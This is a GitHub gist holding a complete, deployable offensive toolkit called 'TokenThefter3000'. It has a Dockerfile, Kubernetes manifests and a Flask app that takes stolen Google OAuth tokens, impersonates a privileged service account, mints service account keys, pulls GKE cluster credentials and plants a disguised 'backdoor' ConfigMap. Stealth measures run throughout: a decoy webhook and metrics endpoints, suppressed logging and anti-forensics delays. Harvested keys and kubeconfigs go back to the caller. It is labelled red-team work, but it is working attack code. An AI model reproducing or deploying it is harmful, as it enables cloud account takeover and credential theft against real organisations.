Last active
September 17, 2025 19:14
-
-
Save MaxwellDPS/a661f771eb509f21cf2f07a37df917e7 to your computer and use it in GitHub Desktop.
token_thefter_3000, duh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM python:3.11-slim | |
| # Install dependencies | |
| RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/* | |
| WORKDIR /app | |
| # Install Python packages | |
| RUN pip install --no-cache-dir \ | |
| Flask==3.0.0 \ | |
| google-auth==2.23.4 \ | |
| google-api-python-client==2.108.0 \ | |
| kubernetes==28.1.0 \ | |
| requests==2.31.0 | |
| # Copy exploit code | |
| COPY flask_app_redteam.py /app/flask_app.py | |
| # Non-root user for stealth | |
| RUN useradd -m -u 1000 appuser && chown -R appuser:appuser /app | |
| USER appuser | |
| EXPOSE 5000 | |
| CMD ["python", "flask_app.py"] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Core Flask | |
| Flask | |
| # Google Cloud dependencies | |
| gcloud | |
| google-auth | |
| google-api-python-client | |
| google-cloud-container | |
| # Kubernetes | |
| kubernetes | |
| requests |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apiVersion: v1 | |
| kind: ConfigMap | |
| metadata: | |
| name: nginx-config | |
| data: | |
| nginx.conf: | | |
| events { | |
| worker_connections 1024; | |
| } | |
| http { | |
| upstream flask_app { | |
| server localhost:5000; | |
| } | |
| server { | |
| listen 80; | |
| listen 443 ssl; | |
| server_name _; | |
| # Self-signed SSL | |
| ssl_certificate /etc/nginx/certs/tls.crt; | |
| ssl_certificate_key /etc/nginx/certs/tls.key; | |
| location / { | |
| proxy_pass http://flask_app; | |
| proxy_set_header Host $host; | |
| proxy_set_header X-Real-IP $remote_addr; | |
| proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; | |
| proxy_set_header X-Forwarded-Proto $scheme; | |
| # Timeout settings | |
| proxy_connect_timeout 60s; | |
| proxy_send_timeout 60s; | |
| proxy_read_timeout 60s; | |
| } | |
| } | |
| } | |
| --- | |
| apiVersion: apps/v1 | |
| kind: Deployment | |
| metadata: | |
| name: token-catcher | |
| labels: | |
| app: webhook-processor | |
| component: backend | |
| spec: | |
| replicas: 1 | |
| selector: | |
| matchLabels: | |
| app: webhook-processor | |
| template: | |
| metadata: | |
| labels: | |
| app: webhook-processor | |
| spec: | |
| initContainers: | |
| - name: cert-generator | |
| image: alpine/openssl:latest | |
| command: ["/bin/sh"] | |
| args: | |
| - -c | |
| - | | |
| if [ ! -f /etc/nginx/certs/tls.crt ]; then | |
| openssl req -x509 -nodes -days 365 -newkey rsa:2048 \ | |
| -keyout /etc/nginx/certs/tls.key \ | |
| -out /etc/nginx/certs/tls.crt \ | |
| -subj "/CN=webhook.example.com/O=Example Inc./C=US" | |
| echo "Generated self-signed certificate" | |
| else | |
| echo "Using existing certificate" | |
| fi | |
| volumeMounts: | |
| - name: tls-certs | |
| mountPath: /etc/nginx/certs | |
| containers: | |
| # Flask token catcher | |
| - name: flask-app | |
| image: gcr.io/PROJECT_ID/token-catcher:latest | |
| imagePullPolicy: Always | |
| ports: | |
| - containerPort: 5000 | |
| name: flask | |
| env: | |
| - name: GCP_PROJECT_ID | |
| value: "target-project-id" | |
| - name: SERVICE_ACCOUNT_EMAIL | |
| value: "[email protected]" | |
| - name: GKE_CLUSTER_NAME | |
| value: "target-cluster" | |
| - name: GKE_CLUSTER_ZONE | |
| value: "us-central1-a" | |
| - name: CONFIGMAP_NAME | |
| value: "exfil-data" | |
| - name: CONFIGMAP_NAMESPACE | |
| value: "default" | |
| - name: FLASK_ENV | |
| value: "production" | |
| - name: LOG_LEVEL | |
| value: "ERROR" # Reduce logs for stealth | |
| resources: | |
| requests: | |
| memory: "256Mi" | |
| cpu: "250m" | |
| limits: | |
| memory: "512Mi" | |
| cpu: "500m" | |
| volumeMounts: | |
| - name: tmp | |
| mountPath: /tmp | |
| - name: exfil-storage | |
| mountPath: /app/exfil | |
| livenessProbe: | |
| httpGet: | |
| path: /health | |
| port: 5000 | |
| initialDelaySeconds: 30 | |
| periodSeconds: 30 | |
| readinessProbe: | |
| httpGet: | |
| path: /health | |
| port: 5000 | |
| initialDelaySeconds: 10 | |
| periodSeconds: 10 | |
| # Nginx TLS sidecar | |
| - name: nginx-tls | |
| image: nginx:alpine | |
| ports: | |
| - containerPort: 443 | |
| name: https | |
| volumeMounts: | |
| - name: nginx-config | |
| mountPath: /etc/nginx/nginx.conf | |
| subPath: nginx.conf | |
| - name: tls-certs | |
| mountPath: /etc/nginx/certs | |
| readOnly: true | |
| resources: | |
| requests: | |
| memory: "64Mi" | |
| cpu: "50m" | |
| limits: | |
| memory: "128Mi" | |
| cpu: "100m" | |
| volumes: | |
| - name: nginx-config | |
| configMap: | |
| name: nginx-config | |
| - name: tls-certs | |
| emptyDir: {} | |
| - name: tmp | |
| emptyDir: {} | |
| - name: exfil-storage | |
| emptyDir: {} | |
| # Security context for stealth | |
| securityContext: | |
| runAsNonRoot: true | |
| runAsUser: 1000 | |
| fsGroup: 1000 | |
| --- | |
| apiVersion: v1 | |
| kind: Service | |
| metadata: | |
| name: webhook-service | |
| labels: | |
| app: webhook-processor | |
| spec: | |
| type: LoadBalancer # Or NodePort for internal access | |
| selector: | |
| app: webhook-processor | |
| ports: | |
| - port: 443 | |
| targetPort: 443 | |
| protocol: TCP | |
| name: https | |
| - port: 80 | |
| targetPort: 443 | |
| protocol: TCP | |
| name: http |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| RED TEAM Token Weaponization Tool | |
| Exploit stolen OAuth tokens for GCP/GKE privilege escalation | |
| """ | |
| import base64 | |
| import json | |
| import tempfile | |
| import os | |
| import logging | |
| import time | |
| import random | |
| import hashlib | |
| from typing import Optional, Tuple, Dict, Any | |
| import traceback | |
| from flask import Flask, request, jsonify | |
| from google.auth import impersonated_credentials | |
| from google.auth.transport.requests import Request | |
| from google.oauth2.credentials import Credentials | |
| from googleapiclient import discovery | |
| from kubernetes import client, config | |
| import google.auth | |
| # Stealth mode - minimal logging | |
| logging.basicConfig( | |
| level=logging.ERROR, # Only log errors to reduce detection | |
| format='[%(asctime)s] %(message)s', | |
| datefmt='%Y-%m-%d %H:%M:%S' | |
| ) | |
| logger = logging.getLogger(__name__) | |
| class TokenThefter3000: | |
| """Red Team exploitation class for GCP/GKE privilege escalation""" | |
| def __init__(self, | |
| project_id: str, | |
| service_account_email: str, | |
| gke_cluster_name: str, | |
| gke_cluster_zone: Optional[str] = None, | |
| gke_cluster_region: Optional[str] = None): | |
| self.project_id = project_id | |
| self.service_account_email = service_account_email | |
| self.gke_cluster_name = gke_cluster_name | |
| self.gke_cluster_zone = gke_cluster_zone | |
| self.gke_cluster_region = gke_cluster_region | |
| # Tracking for exfiltration | |
| self.compromised_keys = [] | |
| def anti_forensics_delay(self): | |
| """Random delay to avoid pattern detection""" | |
| delay = random.uniform(0.5, 3.0) | |
| time.sleep(delay) | |
| def delete_service_account_key(self, credentials: Credentials, key_name: str): | |
| """ | |
| Delete a service account key. | |
| Args: | |
| credentials: Credentials with permission to delete keys | |
| key_name: Full resource name of the key | |
| """ | |
| print(f"Deleting key: {key_name}") | |
| service = discovery.build('iam', 'v1', credentials=credentials) | |
| try: | |
| service.projects().serviceAccounts().keys().delete(name=key_name).execute() | |
| print("Successfully deleted key") | |
| except Exception as e: | |
| print(f"WARNING: Failed to delete key: {e}") | |
| print("Manual cleanup required!") | |
| def escalate_privileges(self, oauth_token: str) -> Tuple[Any, str, str]: | |
| """ | |
| Main exploitation flow | |
| Returns: (impersonated_creds, key_name, key_json_data) | |
| """ | |
| # Create credentials from stolen token | |
| source_credentials = Credentials(token=oauth_token) | |
| # Impersonate high-privilege service account | |
| impersonated_creds = impersonated_credentials.Credentials( | |
| source_credentials=source_credentials, | |
| target_principal=self.service_account_email, | |
| target_scopes=['https://www.googleapis.com/auth/cloud-platform'], | |
| lifetime=3600 | |
| ) | |
| # Refresh to validate | |
| impersonated_creds.refresh(Request()) | |
| # Create persistent service account key | |
| service = discovery.build('iam', 'v1', credentials=impersonated_creds) | |
| key_response = service.projects().serviceAccounts().keys().create( | |
| name=f'projects/{self.project_id}/serviceAccounts/{self.service_account_email}', | |
| body={'privateKeyType': 'TYPE_GOOGLE_CREDENTIALS_FILE'} | |
| ).execute() | |
| key_name = key_response['name'] | |
| key_json_data = base64.b64decode(key_response['privateKeyData']).decode('utf-8') | |
| # Store for later use | |
| self.compromised_keys.append({ | |
| 'key_name': key_name, | |
| 'key_data': key_json_data, | |
| 'service_account': self.service_account_email, | |
| 'created_at': time.time() | |
| }) | |
| return impersonated_creds, key_name, key_json_data | |
| def plant_configmap(self, kubeconfig_dict: Dict[str, Any], | |
| namespace: str = "default") -> bool: | |
| """Plant a backdoor ConfigMap with exfiltrated data""" | |
| with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f: | |
| json.dump(kubeconfig_dict, f) | |
| temp_kubeconfig = f.name | |
| try: | |
| config.load_kube_config(config_file=temp_kubeconfig) | |
| v1 = client.CoreV1Api() | |
| # Create backdoor ConfigMap with exfiltrated data | |
| backdoor_data = { | |
| "beacon": hashlib.sha256(os.urandom(32)).hexdigest(), | |
| "timestamp": str(time.time()), | |
| "compromised_at": time.strftime('%Y-%m-%d %H:%M:%S'), | |
| "exfil_data": json.dumps(self.exfiltrated_data), | |
| "keys": json.dumps(self.compromised_keys) | |
| } | |
| config_map = client.V1ConfigMap( | |
| api_version="v1", | |
| kind="ConfigMap", | |
| metadata=client.V1ObjectMeta( | |
| name=f"webhook-{hashlib.md5(os.urandom(8)).hexdigest()[:8]}", | |
| labels={ | |
| "app": "webhook-processor", # Disguise as legitimate | |
| "managed-by": "helm" # Appear managed | |
| } | |
| ), | |
| data=backdoor_data | |
| ) | |
| v1.create_namespaced_config_map(namespace=namespace, body=config_map) | |
| return True | |
| except Exception: | |
| # Try to update existing if creation fails | |
| try: | |
| existing_cms = v1.list_namespaced_config_map(namespace) | |
| if existing_cms.items: | |
| target_cm = existing_cms.items[0].metadata.name | |
| v1.patch_namespaced_config_map( | |
| name=target_cm, | |
| namespace=namespace, | |
| body=config_map | |
| ) | |
| return True | |
| except: | |
| pass | |
| return False | |
| finally: | |
| os.unlink(temp_kubeconfig) | |
| def get_gke_cluster_credentials(self, credentials: Credentials) -> Dict[str, Any]: | |
| """Get GKE cluster access""" | |
| container_service = discovery.build('container', 'v1', credentials=credentials) | |
| if self.gke_cluster_zone: | |
| cluster_path = f"projects/{self.project_id}/locations/{self.gke_cluster_zone}/clusters/{self.gke_cluster_name}" | |
| elif self.gke_cluster_region: | |
| cluster_path = f"projects/{self.project_id}/locations/{self.gke_cluster_region}/clusters/{self.gke_cluster_name}" | |
| else: | |
| raise ValueError("No cluster location specified") | |
| cluster = container_service.projects().locations().clusters().get( | |
| name=cluster_path | |
| ).execute() | |
| kubeconfig = { | |
| 'apiVersion': 'v1', | |
| 'kind': 'Config', | |
| 'current-context': 'gke-context', | |
| 'clusters': [{ | |
| 'name': 'gke-cluster', | |
| 'cluster': { | |
| 'certificate-authority-data': cluster['masterAuth']['clusterCaCertificate'], | |
| 'server': f"https://{cluster['endpoint']}" | |
| } | |
| }], | |
| 'contexts': [{ | |
| 'name': 'gke-context', | |
| 'context': { | |
| 'cluster': 'gke-cluster', | |
| 'user': 'gke-user' | |
| } | |
| }], | |
| 'users': [{ | |
| 'name': 'gke-user', | |
| 'user': { | |
| 'token': credentials.token | |
| } | |
| }] | |
| } | |
| return kubeconfig | |
| def full_exploitation_chain(self, oauth_token: str) -> Dict[str, Any]: | |
| """Execute complete attack chain""" | |
| results = { | |
| 'status': 'success', | |
| 'timestamp': time.time(), | |
| 'phases': {} | |
| } | |
| try: | |
| # Phase 1: Privilege Escalation | |
| self.anti_forensics_delay() | |
| impersonated_creds, key_name, key_json_data = self.escalate_privileges(oauth_token) | |
| results['phases']['privilege_escalation'] = 'success' | |
| results['service_account_key'] = base64.b64encode(key_json_data.encode()).decode() | |
| # Phase 2: Access Cluster | |
| self.anti_forensics_delay() | |
| kubeconfig = self.get_gke_cluster_credentials(impersonated_creds) | |
| results['phases']['cluster_access'] = 'success' | |
| results['kube_config'] = kubeconfig | |
| # Phase 3: Plant calling card | |
| self.anti_forensics_delay() | |
| backdoor_success = self.plant_configmap(kubeconfig) | |
| results['phases']['config_planted'] = backdoor_success | |
| # Phase 5: ride into the sunset | |
| results['persistence'] = { | |
| 'key_name': key_name, | |
| 'service_account': self.service_account_email, | |
| 'kube_config': self.gke_cluster_name | |
| } | |
| # delete keys before printing to invalidate | |
| self.delete_service_account_key(impersonated_creds, key_name) | |
| except Exception as e: | |
| results['status'] = 'partial' | |
| results['error'] = str(e) | |
| results['traceback'] = traceback.format_exc() | |
| return results | |
| # Flask Application | |
| app = Flask(__name__) | |
| app.config['DEBUG'] = False | |
| # Configuration from environment | |
| CONFIG = { | |
| "project_id": os.environ.get("GCP_PROJECT_ID", "target-project"), | |
| "service_account_email": os.environ.get("SERVICE_ACCOUNT_EMAIL", "[email protected]"), | |
| "gke_cluster_name": os.environ.get("GKE_CLUSTER_NAME", "production-cluster"), | |
| "gke_cluster_zone": os.environ.get("GKE_CLUSTER_ZONE"), | |
| "gke_cluster_region": os.environ.get("GKE_CLUSTER_REGION"), | |
| } | |
| @app.route('/catch', methods=['POST']) | |
| @app.route('/api/webhook', methods=['POST']) # Alternative endpoint | |
| @app.route('/health/ready', methods=['POST']) # Disguised endpoint | |
| def exploit_token(): | |
| """Token exploitation endpoint""" | |
| try: | |
| data = request.get_json() | |
| if not data or 'token' not in data: | |
| # Return innocent-looking error | |
| return jsonify({ | |
| "error": "Invalid webhook payload", | |
| "status": "rejected" | |
| }), 400 | |
| oauth_token = data['token'].strip() | |
| # Initialize exploiter | |
| exploiter = TokenThefter3000( | |
| project_id=CONFIG["project_id"], | |
| service_account_email=CONFIG["service_account_email"], | |
| gke_cluster_name=CONFIG["gke_cluster_name"], | |
| gke_cluster_zone=CONFIG["gke_cluster_zone"], | |
| gke_cluster_region=CONFIG["gke_cluster_region"] | |
| ) | |
| # Execute exploitation chain | |
| results = exploiter.full_exploitation_chain(oauth_token) | |
| # Return results (with sensitive data for C2) | |
| return jsonify(results), 200 | |
| except Exception as e: | |
| # Generic error to avoid revealing details | |
| return jsonify({ | |
| "error": "Processing failed", | |
| "id": hashlib.md5(str(e).encode()).hexdigest() | |
| }), 500 | |
| @app.route('/health', methods=['GET']) | |
| @app.route('/healthz', methods=['GET']) | |
| @app.route('/ready', methods=['GET']) | |
| def health_check(): | |
| """Innocent health check endpoints""" | |
| return jsonify({"status": "healthy"}), 200 | |
| @app.route('/metrics', methods=['GET']) | |
| def metrics(): | |
| """Fake Prometheus metrics to appear legitimate""" | |
| return """# HELP http_requests_total Total HTTP requests | |
| # TYPE http_requests_total counter | |
| http_requests_total{method="GET",endpoint="/health"} 42 | |
| # HELP up Service status | |
| # TYPE up gauge | |
| up 1 | |
| """, 200, {'Content-Type': 'text/plain'} | |
| @app.route('/', methods=['GET']) | |
| def home(): | |
| """Decoy home page""" | |
| return jsonify({ | |
| "service": "Webhook Processor", | |
| "version": "2.1.0", | |
| "status": "operational" | |
| }), 200 | |
| if __name__ == "__main__": | |
| # Run without debug mode for stealth | |
| app.run(host='0.0.0.0', port=5000, debug=False) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment